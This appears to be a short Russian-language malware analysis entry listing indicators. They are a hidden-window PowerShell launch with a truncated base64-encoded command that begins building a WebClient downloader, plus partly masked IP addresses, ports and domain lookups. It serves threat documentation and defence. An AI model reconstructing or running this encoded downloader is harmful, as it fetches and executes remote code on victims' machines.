Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAF8AMwA0ADQAXwAyAD0AKAAnAE4AXwAnACsAJwBfAF8AMQBfACcAKQA7ACQAegBfAF8AXwBfADAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbAA2ADkAXwA5ADUAMQAwAD0AKAAnAGgAdAB0AH...
- '11#.#4.81.160':80
- '11#.#5.25.201':8081
- '21#.#59.168.108':80
- DNS ASK ka###bazar.com
- DNS ASK de##.#ichvutop.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAF8AMwA0ADQAXwAyAD0AKAAnAE4AXwAnACsAJwBfAF8AMQBfACcAKQA7ACQAegBfAF8AXwBfADAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbAA2ADkAXwA5ADUAMQAwAD0AKAAnAGgAdAB0AH...' (со скрытым окном)